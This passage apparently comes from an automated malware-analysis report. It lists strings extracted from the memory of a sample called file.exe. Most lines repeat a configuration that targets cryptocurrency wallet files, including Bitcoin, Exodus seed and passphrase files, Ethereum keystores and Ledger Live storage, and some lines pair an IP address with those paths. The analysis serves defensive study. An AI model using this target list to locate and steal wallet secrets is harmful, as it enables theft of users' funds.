Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\Exodus\\window-state.json7T
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\Exodus\\window-state.json7T
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp{T
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*LT
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session 